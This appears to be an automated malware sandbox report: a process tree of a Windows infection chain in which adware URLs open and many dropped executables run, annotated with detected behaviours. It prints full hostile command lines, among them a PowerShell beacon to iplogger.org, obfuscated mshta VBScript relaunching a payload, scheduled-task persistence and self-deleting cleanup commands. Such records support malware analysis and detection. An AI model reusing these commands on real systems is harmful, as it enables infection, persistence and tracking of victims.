C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Users\Admin\AppData\Local\Temp\32-dfbd0-7c3-ffa93-56924b24d92eb\Xaecelodyme.exe"C:\Users\Admin\AppData\Local\Temp\32-dfbd0-7c3-ffa93-56924b24d92eb\Xaecelodyme.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\br01nqei.sbn\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\br01nqei.sbn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\br01nqei.sbn\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 26011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzpq2moe.lc3\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\bzpq2moe.lc3\installer.exeC:\Users\Admin\AppData\Local\Temp\bzpq2moe.lc3\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bzpq2moe.lc3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bzpq2moe.lc3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631826478 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2xk4slrv.iyj\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2xk4slrv.iyj\anyname.exeC:\Users\Admin\AppData\Local\Temp\2xk4slrv.iyj\anyname.exe10⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vgnlflmt.fdo\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\vgnlflmt.fdo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vgnlflmt.fdo\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 26011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb12mm3l.qsi\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu2094524d5e5b.exeThu2094524d5e5b.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\8Dx6G3rKa1KwUk2IIbKkP0kn.exe"C:\Users\Admin\Documents\8Dx6G3rKa1KwUk2IIbKkP0kn.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\aZjctWgsHV6P7KIx1G1_opKn.exe"C:\Users\Admin\Documents\aZjctWgsHV6P7KIx1G1_opKn.exe"6⤵
-
C:\Users\Admin\Documents\aZjctWgsHV6P7KIx1G1_opKn.exeC:\Users\Admin\Documents\aZjctWgsHV6P7KIx1G1_opKn.exe7⤵
-
C:\Users\Admin\Documents\66iEvB15JkPyDpu_lDRZ_EoF.exe"C:\Users\Admin\Documents\66iEvB15JkPyDpu_lDRZ_EoF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\saEZ8ue4EJMdZOE00Tlskv1P.exe"C:\Users\Admin\Documents\saEZ8ue4EJMdZOE00Tlskv1P.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\F_lk_JaGzqtWoJkiAsw334Fw.exe"C:\Users\Admin\Documents\F_lk_JaGzqtWoJkiAsw334Fw.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exe"C:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exe"6⤵
-
C:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exeC:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exe7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exeC:\Users\Admin\Documents\aqXGRcOEiqeVjT5h8ANlzcbl.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\PP52qmXUTM7Tv2iJbzl6a1AZ.exe"C:\Users\Admin\Documents\PP52qmXUTM7Tv2iJbzl6a1AZ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\RXWlUzceBvHUn0peqGPbQAKl.exe"C:\Users\Admin\Documents\RXWlUzceBvHUn0peqGPbQAKl.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\iGbH4EiaZ3gaqs7k2DiSILET.exe"C:\Users\Admin\Documents\iGbH4EiaZ3gaqs7k2DiSILET.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\qOtYy6HWbFjWL0hSDSYFLkzM.exe"C:\Users\Admin\Documents\qOtYy6HWbFjWL0hSDSYFLkzM.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\EII6ojE_T8XvHDppg6GzRkkh.exe"C:\Users\Admin\Documents\EII6ojE_T8XvHDppg6GzRkkh.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\EII6ojE_T8XvHDppg6GzRkkh.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\LosqpIVdwGY4vw4Xet3ZZWha.exe"C:\Users\Admin\Documents\LosqpIVdwGY4vw4Xet3ZZWha.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GIM_h4lb8TDXG6SK2Do7ufwM.exe"C:\Users\Admin\Documents\GIM_h4lb8TDXG6SK2Do7ufwM.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\lewAaFEQKoAtxsIorZI7nAe9.exe"C:\Users\Admin\Documents\lewAaFEQKoAtxsIorZI7nAe9.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\VYq4BaBciWuUHhsORgKBwehH.exe"C:\Users\Admin\Documents\VYq4BaBciWuUHhsORgKBwehH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\VYq4BaBciWuUHhsORgKBwehH.exe"C:\Users\Admin\Documents\VYq4BaBciWuUHhsORgKBwehH.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VYq4BaBciWuUHhsORgKBwehH.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VYq4BaBciWuUHhsORgKBwehH.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VYq4BaBciWuUHhsORgKBwehH.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\0FDyZSElt7_3aBewrpbLOr1U.exe"C:\Users\Admin\Documents\0FDyZSElt7_3aBewrpbLOr1U.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 2407⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\zLoSjPf2ZfrqA_TYWEcGoiFh.exe"C:\Users\Admin\Documents\zLoSjPf2ZfrqA_TYWEcGoiFh.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\mWbesZiW7ZZpVbyzRhOPq0KE.exe"C:\Users\Admin\Documents\mWbesZiW7ZZpVbyzRhOPq0KE.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\xBcZMpcDzg4dSTAs69BTO623.exe"C:\Users\Admin\Documents\xBcZMpcDzg4dSTAs69BTO623.exe"6⤵
-
C:\Users\Admin\Documents\0RjlQbqGZnm3Q0nDuqQu_h9u.exe"C:\Users\Admin\Documents\0RjlQbqGZnm3Q0nDuqQu_h9u.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 2447⤵
- Program crash
-
C:\Users\Admin\Documents\G8N6ihg9oaCVUvNViEoVtMu0.exe"C:\Users\Admin\Documents\G8N6ihg9oaCVUvNViEoVtMu0.exe"6⤵
-
C:\Users\Admin\Documents\kpzWqK2ea4mB4UvmDDGiQ_7e.exe"C:\Users\Admin\Documents\kpzWqK2ea4mB4UvmDDGiQ_7e.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\y43VAKsse4EkHPjjadC2dxXp.exe"C:\Users\Admin\Documents\y43VAKsse4EkHPjjadC2dxXp.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\esCrnORUJegTZxWrbKqD0WIB.exe"C:\Users\Admin\Documents\esCrnORUJegTZxWrbKqD0WIB.exe"8⤵
-
C:\Users\Admin\Documents\6b2SZvDYedtbgl1uZk9SdVok.exe"C:\Users\Admin\Documents\6b2SZvDYedtbgl1uZk9SdVok.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2529⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\MnOiNADlc5aCFN2VTHkc7wY3.exe"C:\Users\Admin\Documents\MnOiNADlc5aCFN2VTHkc7wY3.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 2529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\HPOHSa_2CBJjurk6Nrwh00UZ.exe"C:\Users\Admin\Documents\HPOHSa_2CBJjurk6Nrwh00UZ.exe"8⤵
-
C:\ProgramData\3612794.exe"C:\ProgramData\3612794.exe"9⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 214810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\ProgramData\490049.exe"C:\ProgramData\490049.exe"9⤵
-
C:\Users\Admin\Documents\LqkFtkDyHi6mEO4dqb_KzwQl.exe"C:\Users\Admin\Documents\LqkFtkDyHi6mEO4dqb_KzwQl.exe"8⤵
-
C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe"C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\nSWxRFNMfgiBRtBbvk9uXEE1.exe" ) do taskkill -iM "%~nxq" /f10⤵
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "nSWxRFNMfgiBRtBbvk9uXEE1.exe" /f11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\toYHUp0Z1Gg7u2DU3FYdIajh.exe"C:\Users\Admin\Documents\toYHUp0Z1Gg7u2DU3FYdIajh.exe"8⤵
-
C:\Users\Admin\Documents\J0ANJwclVEI7N7n2YnW92_Ra.exe"C:\Users\Admin\Documents\J0ANJwclVEI7N7n2YnW92_Ra.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3C8B8.tmp\J0ANJwclVEI7N7n2YnW92_Ra.tmp"C:\Users\Admin\AppData\Local\Temp\is-3C8B8.tmp\J0ANJwclVEI7N7n2YnW92_Ra.tmp" /SL5="$10460,506127,422400,C:\Users\Admin\Documents\J0ANJwclVEI7N7n2YnW92_Ra.exe"9⤵
- Loads dropped DLL
-
